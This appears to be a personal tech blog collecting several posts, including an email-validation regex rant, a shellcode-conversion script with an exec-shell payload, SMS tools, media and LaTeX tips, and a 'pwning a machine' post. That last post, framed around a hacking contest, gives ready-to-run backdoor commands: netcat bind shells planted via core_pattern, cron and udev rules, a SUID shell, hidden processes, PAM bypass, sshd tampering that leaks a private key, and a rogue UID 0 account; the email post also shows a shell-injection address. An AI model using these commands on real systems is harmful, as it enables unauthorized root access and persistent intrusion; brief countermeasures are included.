WTFOTM: Email validating RegExp

I think I’ll start a new series: My wtf of the month. This time, it’s a regular expression I found.

How much does it take to validate an email address, you might ask. Well, can’t be that hard, right? If you read the corresponding RFC 5322, you’ll notice that the local part of an email address (that is the part in front of the “@”) contains “dot-atoms”. Section 3.4.1 writes:

local-part      =   dot-atom / quoted-string / obs-local-part

At the end of the day, a “dot-atom” is a “dot-atom-text” which is a “atext” which is according to section 3.2.3:

atext           =   ALPHA / DIGIT /    ; Printable US-ASCII
“!” / “#” /        ;  characters not including
“$” / “%” /        ;  specials.  Used for atoms.
“&” / “‘” /
“*” / “+” /
“-” / “/” /
“=” / “?” /
“^” / “_” /
“`” / “{” /
“|” / “}” /
“~”

That effectively allows you to have email addresses like !foo$bar/baz=qux@example.com, "#~foo@bar^^"@example.com, `echo${LFS}ssh-rsa${LFS}AAA...|tee${LFS}~/.ssh/authorized_keys`@example.com. I am more than curious to see how servers and MUAs (especially on mobile devices) handle these cases.

I came around to bother because some poor guy wanted to implement email address validation in Evolution. I found the yet untested but obviously correct way in a Perl module:

$RFC822PAT = <<'EOF';
[\040\t]*(?:\([^\\\x80-\xff\n\015()]*(?:(?:\\[^\x80-\xff]|\([^\\\x80-\
xff\n\015()]*(?:\\[^\x80-\xff][^\\\x80-\xff\n\015()]*)*\))[^\\\x80-\xf
f\n\015()]*)*\)[\040\t]*)*(?:(?:[^(\040)<>@,;:".\\\[\]\000-\037\x80-\x
ff]+(?![^(\040)<>@,;:".\\\[\]\000-\037\x80-\xff])|"[^\\\x80-\xff\n\015
"]*(?:\\[^\x80-\xff][^\\\x80-\xff\n\015"]*)*")[\040\t]*(?:\([^\\\x80-\
xff\n\015()]*(?:(?:\\[^\x80-\xff]|\([^\\\x80-\xff\n\015()]*(?:\\[^\x80
-\xff][^\\\x80-\xff\n\015()]*)*\))[^\\\x80-\xff\n\015()]*)*\)[\040\t]*
)*(?:\.[\040\t]*(?:\([^\\\x80-\xff\n\015()]*(?:(?:\\[^\x80-\xff]|\([^\
\\x80-\xff\n\015()]*(?:\\[^\x80-\xff][^\\\x80-\xff\n\015()]*)*\))[^\\\
x80-\xff\n\015()]*)*\)[\040\t]*)*(?:[^(\040)<>@,;:".\\\[\]\000-\037\x8
0-\xff]+(?![^(\040)<>@,;:".\\\[\]\000-\037\x80-\xff])|"[^\\\x80-\xff\n
\015"]*(?:\\[^\x80-\xff][^\\\x80-\xff\n\015"]*)*")[\040\t]*(?:\([^\\\x
80-\xff\n\015()]*(?:(?:\\[^\x80-\xff]|\([^\\\x80-\xff\n\015()]*(?:\\[^
\x80-\xff][^\\\x80-\xff\n\015()]*)*\))[^\\\x80-\xff\n\015()]*)*\)[\040
\t]*)*)*@[\040\t]*(?:\([^\\\x80-\xff\n\015()]*(?:(?:\\[^\x80-\xff]|\([
^\\\x80-\xff\n\015()]*(?:\\[^\x80-\xff][^\\\x80-\xff\n\015()]*)*\))[^\
\\x80-\xff\n\015()]*)*\)[\040\t]*)*(?:[^(\040)<>@,;:".\\\[\]\000-\037\
x80-\xff]+(?![^(\040)<>@,;:".\\\[\]\000-\037\x80-\xff])|\[(?:[^\\\x80-
\xff\n\015\[\]]|\\[^\x80-\xff])*\])[\040\t]*(?:\([^\\\x80-\xff\n\015()
]*(?:(?:\\[^\x80-\xff]|\([^\\\x80-\xff\n\015()]*(?:\\[^\x80-\xff][^\\\
x80-\xff\n\015()]*)*\))[^\\\x80-\xff\n\015()]*)*\)[\040\t]*)*(?:\.[\04
0\t]*(?:\([^\\\x80-\xff\n\015()]*(?:(?:\\[^\x80-\xff]|\([^\\\x80-\xff\
n\015()]*(?:\\[^\x80-\xff][^\\\x80-\xff\n\015()]*)*\))[^\\\x80-\xff\n\
015()]*)*\)[\040\t]*)*(?:[^(\040)<>@,;:".\\\[\]\000-\037\x80-\xff]+(?!
[^(\040)<>@,;:".\\\[\]\000-\037\x80-\xff])|\[(?:[^\\\x80-\xff\n\015\[\
]]|\\[^\x80-\xff])*\])[\040\t]*(?:\([^\\\x80-\xff\n\015()]*(?:(?:\\[^\
x80-\xff]|\([^\\\x80-\xff\n\015()]*(?:\\[^\x80-\xff][^\\\x80-\xff\n\01
5()]*)*\))[^\\\x80-\xff\n\015()]*)*\)[\040\t]*)*)*|(?:[^(\040)<>@,;:".
\\\[\]\000-\037\x80-\xff]+(?![^(\040)<>@,;:".\\\[\]\000-\037\x80-\xff]
)|"[^\\\x80-\xff\n\015"]*(?:\\[^\x80-\xff][^\\\x80-\xff\n\015"]*)*")[^
()<>@,;:".\\\[\]\x80-\xff\000-\010\012-\037]*(?:(?:\([^\\\x80-\xff\n\0
15()]*(?:(?:\\[^\x80-\xff]|\([^\\\x80-\xff\n\015()]*(?:\\[^\x80-\xff][
^\\\x80-\xff\n\015()]*)*\))[^\\\x80-\xff\n\015()]*)*\)|"[^\\\x80-\xff\
n\015"]*(?:\\[^\x80-\xff][^\\\x80-\xff\n\015"]*)*")[^()<>@,;:".\\\[\]\
x80-\xff\000-\010\012-\037]*)*<[\040\t]*(?:\([^\\\x80-\xff\n\015()]*(?
:(?:\\[^\x80-\xff]|\([^\\\x80-\xff\n\015()]*(?:\\[^\x80-\xff][^\\\x80-
\xff\n\015()]*)*\))[^\\\x80-\xff\n\015()]*)*\)[\040\t]*)*(?:@[\040\t]*
(?:\([^\\\x80-\xff\n\015()]*(?:(?:\\[^\x80-\xff]|\([^\\\x80-\xff\n\015
()]*(?:\\[^\x80-\xff][^\\\x80-\xff\n\015()]*)*\))[^\\\x80-\xff\n\015()
]*)*\)[\040\t]*)*(?:[^(\040)<>@,;:".\\\[\]\000-\037\x80-\xff]+(?![^(\0
40)<>@,;:".\\\[\]\000-\037\x80-\xff])|\[(?:[^\\\x80-\xff\n\015\[\]]|\\
[^\x80-\xff])*\])[\040\t]*(?:\([^\\\x80-\xff\n\015()]*(?:(?:\\[^\x80-\
xff]|\([^\\\x80-\xff\n\015()]*(?:\\[^\x80-\xff][^\\\x80-\xff\n\015()]*
)*\))[^\\\x80-\xff\n\015()]*)*\)[\040\t]*)*(?:\.[\040\t]*(?:\([^\\\x80
-\xff\n\015()]*(?:(?:\\[^\x80-\xff]|\([^\\\x80-\xff\n\015()]*(?:\\[^\x
80-\xff][^\\\x80-\xff\n\015()]*)*\))[^\\\x80-\xff\n\015()]*)*\)[\040\t
]*)*(?:[^(\040)<>@,;:".\\\[\]\000-\037\x80-\xff]+(?![^(\040)<>@,;:".\\
\[\]\000-\037\x80-\xff])|\[(?:[^\\\x80-\xff\n\015\[\]]|\\[^\x80-\xff])
*\])[\040\t]*(?:\([^\\\x80-\xff\n\015()]*(?:(?:\\[^\x80-\xff]|\([^\\\x
80-\xff\n\015()]*(?:\\[^\x80-\xff][^\\\x80-\xff\n\015()]*)*\))[^\\\x80
-\xff\n\015()]*)*\)[\040\t]*)*)*(?:,[\040\t]*(?:\([^\\\x80-\xff\n\015(
)]*(?:(?:\\[^\x80-\xff]|\([^\\\x80-\xff\n\015()]*(?:\\[^\x80-\xff][^\\
\x80-\xff\n\015()]*)*\))[^\\\x80-\xff\n\015()]*)*\)[\040\t]*)*@[\040\t
]*(?:\([^\\\x80-\xff\n\015()]*(?:(?:\\[^\x80-\xff]|\([^\\\x80-\xff\n\0
15()]*(?:\\[^\x80-\xff][^\\\x80-\xff\n\015()]*)*\))[^\\\x80-\xff\n\015
()]*)*\)[\040\t]*)*(?:[^(\040)<>@,;:".\\\[\]\000-\037\x80-\xff]+(?![^(
\040)<>@,;:".\\\[\]\000-\037\x80-\xff])|\[(?:[^\\\x80-\xff\n\015\[\]]|
\\[^\x80-\xff])*\])[\040\t]*(?:\([^\\\x80-\xff\n\015()]*(?:(?:\\[^\x80
-\xff]|\([^\\\x80-\xff\n\015()]*(?:\\[^\x80-\xff][^\\\x80-\xff\n\015()
]*)*\))[^\\\x80-\xff\n\015()]*)*\)[\040\t]*)*(?:\.[\040\t]*(?:\([^\\\x
80-\xff\n\015()]*(?:(?:\\[^\x80-\xff]|\([^\\\x80-\xff\n\015()]*(?:\\[^
\x80-\xff][^\\\x80-\xff\n\015()]*)*\))[^\\\x80-\xff\n\015()]*)*\)[\040
\t]*)*(?:[^(\040)<>@,;:".\\\[\]\000-\037\x80-\xff]+(?![^(\040)<>@,;:".
\\\[\]\000-\037\x80-\xff])|\[(?:[^\\\x80-\xff\n\015\[\]]|\\[^\x80-\xff
])*\])[\040\t]*(?:\([^\\\x80-\xff\n\015()]*(?:(?:\\[^\x80-\xff]|\([^\\
\x80-\xff\n\015()]*(?:\\[^\x80-\xff][^\\\x80-\xff\n\015()]*)*\))[^\\\x
80-\xff\n\015()]*)*\)[\040\t]*)*)*)*:[\040\t]*(?:\([^\\\x80-\xff\n\015
()]*(?:(?:\\[^\x80-\xff]|\([^\\\x80-\xff\n\015()]*(?:\\[^\x80-\xff][^\
\\x80-\xff\n\015()]*)*\))[^\\\x80-\xff\n\015()]*)*\)[\040\t]*)*)?(?:[^
(\040)<>@,;:".\\\[\]\000-\037\x80-\xff]+(?![^(\040)<>@,;:".\\\[\]\000-
\037\x80-\xff])|"[^\\\x80-\xff\n\015"]*(?:\\[^\x80-\xff][^\\\x80-\xff\
n\015"]*)*")[\040\t]*(?:\([^\\\x80-\xff\n\015()]*(?:(?:\\[^\x80-\xff]|
\([^\\\x80-\xff\n\015()]*(?:\\[^\x80-\xff][^\\\x80-\xff\n\015()]*)*\))
[^\\\x80-\xff\n\015()]*)*\)[\040\t]*)*(?:\.[\040\t]*(?:\([^\\\x80-\xff
\n\015()]*(?:(?:\\[^\x80-\xff]|\([^\\\x80-\xff\n\015()]*(?:\\[^\x80-\x
ff][^\\\x80-\xff\n\015()]*)*\))[^\\\x80-\xff\n\015()]*)*\)[\040\t]*)*(
?:[^(\040)<>@,;:".\\\[\]\000-\037\x80-\xff]+(?![^(\040)<>@,;:".\\\[\]\
000-\037\x80-\xff])|"[^\\\x80-\xff\n\015"]*(?:\\[^\x80-\xff][^\\\x80-\
xff\n\015"]*)*")[\040\t]*(?:\([^\\\x80-\xff\n\015()]*(?:(?:\\[^\x80-\x
ff]|\([^\\\x80-\xff\n\015()]*(?:\\[^\x80-\xff][^\\\x80-\xff\n\015()]*)
*\))[^\\\x80-\xff\n\015()]*)*\)[\040\t]*)*)*@[\040\t]*(?:\([^\\\x80-\x
ff\n\015()]*(?:(?:\\[^\x80-\xff]|\([^\\\x80-\xff\n\015()]*(?:\\[^\x80-
\xff][^\\\x80-\xff\n\015()]*)*\))[^\\\x80-\xff\n\015()]*)*\)[\040\t]*)
*(?:[^(\040)<>@,;:".\\\[\]\000-\037\x80-\xff]+(?![^(\040)<>@,;:".\\\[\
]\000-\037\x80-\xff])|\[(?:[^\\\x80-\xff\n\015\[\]]|\\[^\x80-\xff])*\]
)[\040\t]*(?:\([^\\\x80-\xff\n\015()]*(?:(?:\\[^\x80-\xff]|\([^\\\x80-
\xff\n\015()]*(?:\\[^\x80-\xff][^\\\x80-\xff\n\015()]*)*\))[^\\\x80-\x
ff\n\015()]*)*\)[\040\t]*)*(?:\.[\040\t]*(?:\([^\\\x80-\xff\n\015()]*(
?:(?:\\[^\x80-\xff]|\([^\\\x80-\xff\n\015()]*(?:\\[^\x80-\xff][^\\\x80
-\xff\n\015()]*)*\))[^\\\x80-\xff\n\015()]*)*\)[\040\t]*)*(?:[^(\040)<
>@,;:".\\\[\]\000-\037\x80-\xff]+(?![^(\040)<>@,;:".\\\[\]\000-\037\x8
0-\xff])|\[(?:[^\\\x80-\xff\n\015\[\]]|\\[^\x80-\xff])*\])[\040\t]*(?:
\([^\\\x80-\xff\n\015()]*(?:(?:\\[^\x80-\xff]|\([^\\\x80-\xff\n\015()]
*(?:\\[^\x80-\xff][^\\\x80-\xff\n\015()]*)*\))[^\\\x80-\xff\n\015()]*)
*\)[\040\t]*)*)*>)
EOF

This is a handy 6.5kB regular expression that validates an email address. I wonder how long it takes to compile and to actually match an email address against… (Arr, stupid wordpress escapes all those fancy characters everytime I have the edit widget open 🙁 )

So, now go and fix your email address validating script.

Convert GDB output to C-style shellcode

Due to developing shellcode during the recent days, I ended up needing to convert GDB output to C style strings very often. My sample output from GDB looks like this:
(gdb) disassemble function
Dump of assembler code for function function:
0x08048254 <function+0>:    push   %ebp
0x08048255 <function+1>:    mov    %esp,%ebp
0x08048257 <function+3>:    pop    %ebp
0x08048258 <function+4>:    jmp    0x8048268 <begin>
0x0804825a <function+6>:    inc    %ecx
0x0804825b <function+7>:    inc    %ecx
0x0804825c <function+8>:    inc    %ecx
0x0804825d <function+9>:    inc    %ecx
0x0804825e <function+10>:    jmp    0x80482b3 <bottom>
0x08048260 <function+12>:    pop    %esi
0x08048261 <function+13>:    mov    %esi,%esp
0x08048263 <function+15>:    sub    $0x78,%esp
0x08048266 <function+18>:    xor    %edi,%edi
0x08048268 <begin+0>:    mov    %edi,%eax
0x0804826a <begin+2>:    inc    %eax
0x0804826b <begin+3>:    inc    %eax
0x0804826c <begin+4>:    int    $0x80
0x0804826e <begin+6>:    test   %eax,%eax
0x08048270 <begin+8>:    je     0x8048288 <child>
0x08048272 <parent+0>:    mov    %edi,%eax
0x08048274 <parent+2>:    mov    $0xa2,%al
0x08048276 <parent+4>:    push   $0x11111111
---Type <return> to continue, or q <return> to quit---
0x0804827b <parent+9>:    push   $0x11111111
0x08048280 <parent+14>:    mov    %esp,%ebx
0x08048282 <parent+16>:    mov    %edi,%ecx
0x08048284 <parent+18>:    int    $0x80
0x08048286 <parent+20>:    jmp    0x8048272 <parent>
0x08048288 <child+0>:    mov    -0x204(%esi),%ebx
0x0804828e <child+6>:    mov    %edi,%ecx
0x08048290 <child+8>:    mov    $0x3f,%al
0x08048292 <child+10>:    int    $0x80
0x08048294 <child+12>:    inc    %ecx
0x08048295 <child+13>:    mov    %edi,%eax
0x08048297 <child+15>:    mov    $0x3f,%al
0x08048299 <child+17>:    int    $0x80
0x0804829b <child+19>:    inc    %ecx
0x0804829c <child+20>:    mov    %edi,%eax
0x0804829e <child+22>:    mov    $0x3f,%al
0x080482a0 <child+24>:    int    $0x80
0x080482a2 <execshell+0>:    mov    %edi,%eax
0x080482a4 <execshell+2>:    mov    %al,0x7(%esi)
0x080482a7 <execshell+5>:    push   %eax
0x080482a8 <execshell+6>:    push   %esi
0x080482a9 <execshell+7>:    mov    %edi,%edx
0x080482ab <execshell+9>:    mov    %esp,%ecx
---Type <return> to continue, or q <return> to quit---
0x080482ad <execshell+11>:    mov    %esi,%ebx
0x080482af <execshell+13>:    mov    $0xb,%al
0x080482b1 <execshell+15>:    int    $0x80
0x080482b3 <bottom+0>:    call   0x8048260 <function+12>
0x080482b8 <bottom+5>:    das
0x080482b9 <bottom+6>:    bound  %ebp,0x6e(%ecx)
0x080482bc <bottom+9>:    das
0x080482bd <bottom+10>:    jae    0x8048327 <__floatdisf+55>
0x080482bf <bottom+12>:    inc    %ecx
0x080482c0 <bottom+13>:    ret
End of assembler dump.
(gdb) x/98xb 0x0804825e
0x804825e <function+10>:    0xeb    0x53    0x5e    0x89    0xf4    0x83    0xec    0x78
0x8048266 <function+18>:    0x31    0xff    0x89    0xf8    0x40    0x40    0xcd    0x80
0x804826e <begin+6>:    0x85    0xc0    0x74    0x16    0x89    0xf8    0xb0    0xa2
0x8048276 <parent+4>:    0x68    0x11    0x11    0x11    0x11    0x68    0x11    0x11
0x804827e <parent+12>:    0x11    0x11    0x89    0xe3    0x89    0xf9    0xcd    0x80
0x8048286 <parent+20>:    0xeb    0xea    0x8b    0x9e    0xfc    0xfd    0xff    0xff
0x804828e <child+6>:    0x89    0xf9    0xb0    0x3f    0xcd    0x80    0x41    0x89
0x8048296 <child+14>:    0xf8    0xb0    0x3f    0xcd    0x80    0x41    0x89    0xf8
0x804829e <child+22>:    0xb0    0x3f    0xcd    0x80    0x89    0xf8    0x88    0x46
0x80482a6 <execshell+4>:    0x07    0x50    0x56    0x89    0xfa    0x89    0xe1    0x89
0x80482ae <execshell+12>:    0xf3    0xb0    0x0b    0xcd    0x80    0xe8    0xa8    0xff
0x80482b6 <bottom+3>:    0xff    0xff    0x2f    0x62    0x69    0x6e    0x2f    ---Type <return> to continue, or q <return> to quit---
0x73
0x80482be <bottom+11>:    0x68    0x41
(gdb) Quit

And my desired output are the bytes in these strings:

char shcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
 /* First the NOPs*/
 "\xeb\x04"              /* Jump over the ret addr */
 "\x41\x41\x41\x41"        /* wannabe ret addr */
 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
 /* Second NOP slide */
 "\xeb\x5d\x5e\x89\xf4\x81\xec\xc8\x00\x00\x00\x31\xff\xb8\x02\x00\x00\x00\xcd\x80\x85\xc0\x74\x17\xb8\xa2\x00\x00\x00\x68\xb8\x0b\x00\x00\x68\xb8\x0b\x00\x00\x89\xe3\x89\xf9\xcd\x80\xeb\xe9\x8b\x9e\xfc\xfd\xff\xff\x89\xf9\xb8\x3f\x00\x00\x00\xcd\x80\x41\xb8\x3f\x00\x00\x00\xcd\x80\x41\xb8\x3f\x00\x00\x00\xcd\x80\x89\xf8\x88\x46\x07\x50\x56\x89\xfa\x89\xe1\x89\xf3\xb0\x0b\xcd\x80\xe8\x9e\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41"
 /* that's the shellcode */

So I built a quick and dirty script which does the conversion and helped me saving a lot of time. Is there any better way of making gdb output the shellcode directly?

#!/usr/bin/env python
import sys
 
paginator  = '''---Type  to continue, or q  to quit---'''
 
def convert (to_convert):
    retlines = []
    for line in to_convert.splitlines():
        if line.startswith('--'):
            continue
        pos = line.find(":")
        newline_string = line[pos+1:]
        for needle, replacement  in (('\t', ''),
                       ('0x', r'\x'),
                       ('\n', ''),
                       (paginator, '')):
            newline_string = newline_string.replace(needle, replacement)
        retlines.append (newline_string)
    return "".join(retlines)
 
if __name__ == "__main__":
    to_convert = sys.stdin.read()
    converted = convert (to_convert)
    print converted

Want to take a guess what the shellcode actually does? It’s not too hard to see though.

Split CUE File and losslessly compressed Audio (FLAC, ape, …)

For some reason, I had to split a CUE file and a losslessly compressed audio file into single files to make it one file per track instead of one big file. My audio file was compressed with APE which I didn’t know before at all.  But it has a weird license anyway.

So I came across a really good page describing what to do which is basically using shntool (homepage). It’s really good, easy to use and has built in transcoding through appropriate third party programs, so I could transcode to Vorbis on the fly 🙂 It converts anything to anything, as long as it’s sound so you might find that tool useful as well 🙂

Free SMS

This could be interesting to anyone sending texts (SMS): In Ireland, I guess every operator has a so called webaccess which allows you to send up to a certain number of texts for free. Worldwide. That’s kinda handy because sending a SMS via normal GSM mode easily costs you 10ct. A data connection, however, should be much cheaper  (around 4ct. with O2 Ireland, not even 1ct with Simyo in Germany). You only need credentials to log into their website, so no SIM card is (directly) needed.

Because using the web sucks you want to have a nice and clean interface which you can program and extend yourself. Luckily, there are at least two projects, helping you to send SMS comfortably.

One for your PC is o2sms which is really handy. It’s a Perl script and easily useable:

mkdir -p ~/svn/ ~/bin/
svn co https://o2sms.svn.sourceforge.net/svnroot/o2sms
cat > ~/bin/o2sms <<EOF
#!/bin/sh

pushd ~/svn/o2sms/trunk/o2sms3/lib/
../bin/o2sms $@
popd
EOF

You have to have ~/bin/ in your path of course. I put the following in my /etc/profile:

if [ -d $HOME/bin ]; then
  PATH=$HOME/bin:$PATH
fi

If you don’t have  a PC at hand, you will find Cabbage useful. It’s a J2ME application for you mobile phone and it’s quite easy to use.

You might even find an (semi) open wireless network using the J2ME app which calculates WEP Keys of Eircom routers, so that you don’t even have to spend the money on the data connection. The algorithm is describere here and you can find a Perl or Python, as well as a C++ implementation here.

On O2, you can send free SMS via normal GSM, so it would be a pity if you had to use the Webtexts. As I discovered that sending SMS via a serial connection is easy, I started to write PySMS. It’s still work in progress, but it actually parses your o2sms configuration file so that you can use send_sms instead of o2sms to send your SMS. To get it working right you might want to enter your phones Bluetooth address in /etc/bluetooth/rfcomm.conf. Mine reads:

rfcomm2 {
  bind yes;
  device 00:FO:OB:AR:BA:ZZ;
  channel   2;
  comment "Mah Mobile";
}

Dunno exactly how to determine the channel, but I guess sdptool browse should show “Dial-Up Networking” as service name for the channel.

I’d really like to have a wrapper around send_sms and o2sms which decides for me whether it sends the SMS via GSM, Web or both. But my main problem, beside the lack of time, is that I can’t snoop on stdin to pass it to a second program afterwards. Since I don’t really know if stdin must be read, I can’t read it myself and just send it twice. Also, subprocess.Popen is not particucarly happy accepting anything else than stdin or a string. So if you have a solution to this problem, please show up 🙂

The next step is to write a simple webinterface against this o2sms library and have free SMS for everyone 🙂

New Heise Feeds

Even after  Heise updated its CMS it doesn’t deliver Atom Feeds with an abstract. I hope they’ll at least produce well formed XML… As I think the abstracts, which can be found on the main page or the mobile version, are quite handy, I wrote a parser which will generate an Atom feed with the teaser (and not the first paragraph of the article) built in. I couldn’t use MakeMyRSS not just because it prints an ad every month or so, but because I had the requirement to link to the print URLs instead of the web URLs (I don’t have that requirement anymore). But since MakeMyRSS is not free, I liked to have my own solution anyway 🙂 Plus, it’s not written in Bash 😉

You can find the Atom feed at http://muelli.cryptobitch.de/rss/heise-atom.xml or the parser here. But you’d be better off cloning the repository (hg clone http://hg.cryptobitch.de/geRSSicht/) because you can send me patches more easily 😉

You’ll also find a parser for the adminstrative court of Hamburg and for Telepolis. All the news are in German though, but at least the Heise feed should be easily portable for The H

Making posters with PosteRazor

I had to create a huge poster out of an image. The normal way you do that is to somehow prepare many DIN A4 sheets, so you have to enlarge a given image, cut it into many pieces, probably add some padding and if you’re lucky, you get your PDFs you can print.

But how do you actually do this? I used to use psresize and friends because I just wasn’t aware of anything more useful. Of course, dealing with psresize, psnup etc wasn’t very comfortable and I rarely was successful. I remember that I’ve asked a friend of mine to do it for me several times in the past. He owned a Mac and it was rather comfortable with those authoring tools. I began using OpenOffice to create those posters, but it really is uncomfortable: You have to remember which cutout you’ve used in the previous page, then move the image within the page and hope that you match the previous page. Needless to say, that this takes a considerable amount of time.

I always wanted to have  a tool which works like this: makeposter --format=DINA0 < input.png > poster.pdf It would scale the image, cut it, add padding for glueing and produce several pages in a single PDF.

I now was told about PosteRazor! An incredibly useful tool to do more or less the stuff I want. It is free software and pretty easy to use. It uses neither Gtk+ nor Qt. Instead, Fulltick is used to build the GUI. I have never heard of it, but it’s okay. The widgets are not as beautiful as Gtk’s and the filechooser is especially bad, but the rest seems to be fine. So it serves almost every need I have 🙂

Awesome, isn’t it? I mean not just that it’s really easy, and you have your own poster in five minutes including printing! They even have extremely good marketing! 🙂

Replace LaTeX Itemize Icon with Foot

If you use the LaTeX Beamer package for your presentation and you want to replace your itemize bullets with something more fancy, you might be interested in the following commands:

\setbeamertemplate{itemize item}{\includegraphics[height=1em]{bin/gnome-foot}}
\setbeamertemplate{itemize subitem}{\includegraphics[height=0.8em]{bin/gnome-foot}}

These will set your bullets to anything you want 🙂  A plain LaTeX solution, which won’t work with Beamer, is to  use \labelitem:

\renewcommand{\labelitemi}{\includegraphics{foo}}
\renewcommand{\labelitemii}{\includegraphics{bar}}

Hope this helps 🙂

any2ogg/Theora+Vorbis

My University decided to publish some videos using an DivX Codec. These videos are part of some Software Engineering class and serves as a replacement for real customer interaction.

Anyway, I decided to transcode those videos using a free codec and I boldly announced, that I’ll do that without actually knowing how much work that’d be. In fact, I feared kilobytes of arguments to mencoder or ffmpeg. I also didn’t want to use new and awesome stuff like Transmageddon or Arista, because I wanted a really simple solution, like any2wav. I imagined something like any2theora which simply does what I want.

It turns out, that ffmpeg2theora exists and it does exactly what I want. It is really simple to use, no command line argument whatsoever to produce a well working Theora encoded video with Vorbis encoded sound.

Yay!

g0t r00t? pwning a machine

Imagine you have root access to a machine for, say, 15 minutes. Or better: Imaging you have accidentally left your machine unattended for about 900 seconds and once you’re back, you’re wondering, what an attacker could have done.

I’ll explain a few simple and quick attacks which will have a rather high impact. The main motivation came from the Hacking Contest at the LinuxTag in Berlin. It’s rules in short are: Have your laptop backdoored in 15 minutes by the opponent team while you backdoor theirs, clean your computer in 15 minutes and exploit the opponents laptop in the following 15 minutes.

core pattern

You can give the kernel a crash handler which will be executed if a segfault happens. Ubuntu uses that to launch apport and you can hijack this feature to have your rootshell executed:

   echo '|/bin/nc.traditional -l -p 31337 -e /bin/sh' | sudo tee /proc/sys/kernel/core_pattern
   gedit & kill -SEGV %%

You see, it’s pretty simple, quick to install and it’s powerful as well. You can now connect to localhost 31337 to have a rootshell. Of course you could launch connect back shells or any other malicious program.

To counter this threat, you might want to read this core_pattern file or in doubt erase the signal handler:

  echo '' | sudo tee /proc/sys/kernel/core_pattern

cronjobs

You know cronjobs, don’t you? But do you know the cronjobs of the “games” or “mysql” user? And have you checked your /etc/cron.*/? You better do 😉 Because installing malicious scripts there is pretty simple:

  for u in root games mysql; do sudo crontab -e -u $u; done
  5 * * * * /bin/nc.traditional -l -p 31337 -e /bin/sh

You might want to copy a file with the above mention cron string to  /etc/cron.hourly/ and /etc/cron.d/.

If you are a smart attacker, you have multiple lines containing the same job, especially one line after 1000 newlines, so that the admin has to scroll years to find it…

To counter this, check your cronjobs: sudo ls -l /var/spool/cron/crontabs/ /etc/cron.*/

dash backdoor

If you run a program which has the SUID bit set, then you have the rights of the user owning that file. That can be useful for ping or passwd, but probably isn’t for a shell. That’s why you can’t set the SUID bit on the bash. The “dash”, however, allows that 🙂

  sudo cp /bin/dash /bin/ping4 && sudo chmod u+s /bin/ping4

To find SUID binaries: find / ( -perm -4000 -o -perm -2000 ) -type f -exec ls -la {} ;

You’ll get a rootshell by simply executing ping4.

hide processes (with listening sockets) from ps and lsof

mkdir /tmp/empty
/bin/nc.traditional -l -p 31337 -e /bin/sh &
ps aux | grep $!
sudo mount --bind /tmp/empty /proc/$!
ps aux | grep $!

Countermeasure: netstat -tulpe and checking cat /proc/$$/mountinfo for suspicious mounts over /proc/.

udev exploit device

The idea is to plug an exploit device into that machine and have a rootshell.

I plugged a usb mouse into the laptop, viewed dmesg or udevadm monitor to find the devices ID, which then can be used with udevadm info --path:

  udevadm info --attribute-walk --path=/devices/pci0000:00/0000:00:1d.0/usb5/5-1/5-1:1.0/input/input18

That’ll produce udev attributes which can be used to write rules, e.g.

  SUBSYSTEM=="input", RUN+="/bin/nc.traditional -l -p 31337 -e /bin/sh"

You want to hide that /etc/udev/rules.d or better /lib/udev/rules.d/.

To counter this threat, you have no choice besides:

  grep -rn RUN /etc/udev/rules.d/ /lib/udev/rules.d/

which is unfortunately not that easy.

PAM deauthentify

Most of the time, PAM is the central place for all services to authenticate a user. While configuring PAM is not the most exciting thing I know, you can exploit it without actually know anything about the modules or the syntax.

Simply replace  pam_deny with pam_permit in /etc/pam.d/common-auth:

"auth   requisite           pam_permit.so"

To counter modified PAM rules, there’s nothing you can do besides reading your rules 🙁 If you go down this rabbit hole, bring a flashlight.

A better hack would be to replace the deny module with the permit module! cd /lib/security; ln -f pam_permit.so pam_deny.so

If it’s hardlinked like about, you can find these with

find . -links +1

if it’s copied, instead of hardlinked, you have to compare file hashes or better reinstall libpam-modules.

rewrite sshd config

Public key authentication is very convenient, because you don’t have to remember passwords. Also you can you hijack accounts easily if you add your public key to the files with authorized keys 😉

cat ~/.ssh/id_rsa.pub | sudo tee /root/.wgetrc
cp /etc/ssh/sshd_config /tmp/
Put AuthorizedKeysFile %h/.wgetrc in /etc/ssh/sshd_config
Put Banner /etc/issue.net in /etc/ssh/sshd_config
sudo /etc/init.d/ssh reload
mv /tmp/sshd_config /etc/ssh/
cat ~/.ssh/id_rsa | sudo tee /etc/issue.net

This probably needs some explanation.We first copy the public key into an innocent looking file, then save the original SSHd configuration, before we edit it and put those configuration strings in it. By reloading the SSHd it’ll recognize the new configuration and we then mv the original config back! That way, the admin doesn’t see anything suspicious but the SSHd will run with your configuration! *yay*. In order to use the stored private key, we’ll blow it out to the world by putting it into the SSHd banner 😉

To counter this, either patch your sshd that it’ll immediately reload once the configuration file has been change using inotify (udev does that) or review your SSHd config and reload it even if you haven’t changed anything!

New Users with UID 0

For some reason, it is not important that a user is named “root”, but that it’s uid is 0. So if you create a user with the uid 0, you’ll have root privileges 🙂 Multiple users with the same uid but different name isn’t harmful. So combining this with the 1000 scrolllines trick mentioned above, you have to do something like this:

echo 'hackr:x:0:0:hackr,,,:/home/hackr:/bin/bash' | sudo tee -a /etc/passwd
printf %sn%s hackr hackr | sudo passwd hackr

add 1000 lines to the passwd file and do the things above again.

To counter, grep ':0:' /etc/passwd

Vino

GNOME ships a VNC Server which can be activated with vino-preferences. Or for the lazy people:

gconftool-2 --set /desktop/gnome/remote_access/enabled --type bool true
gconftool-2 --set /desktop/gnome/remote_access/prompt_enabled --type bool false
gconftool-2 --set /desktop/gnome/remote_access/view_only --type bool false

Timestamps

If you want to find files which have been recently modified, you can used “find”:

To find last modified files:

  find -mtime -1 /

Or recently created files

  find -ctime -1 /

If you have a reference file:

  find -newer /path/to/file

